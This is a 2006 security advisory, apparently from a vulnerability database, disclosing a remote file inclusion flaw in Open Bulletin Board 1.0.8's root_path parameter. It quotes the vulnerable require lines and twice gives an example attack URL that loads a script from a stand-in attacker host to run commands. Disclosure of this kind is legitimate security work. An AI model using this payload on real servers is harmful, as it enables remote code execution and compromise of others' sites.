Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability

2006.09.18
Credit: l0x3
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+-------------------------------------------------------------------- + + Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities + +------------------------------------------------------------------- + + Affected Software .: Software + Version .............: Open Bulletin Board 1.0.8 + Venedor ...........: http://www.openbb.com + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Discovered by ..........: Eddy_BAck0o + Contact ...........: l0x3[at]hotmail.com + +-------------------------------------------------------------------- +-------------------------------------------------------------------- + ./index Directory ... ~ [index.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + require $root_path . "base.php"; <--- 30 - 380 + require $root_path . "base.php"; <--- 46 - 380 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Ex --> http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cm d + +------------------------------------------------------------------- + ~ [collector.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + root_path = "./"; <--- 24 - 194 + require $root_path . "base.php"; <--- 159 - 194 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Ex --> http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cm d + +------------------------------------------------------------------- + Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ; Qptan ] ;.... +-------------------------------------------------------------------- +--------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top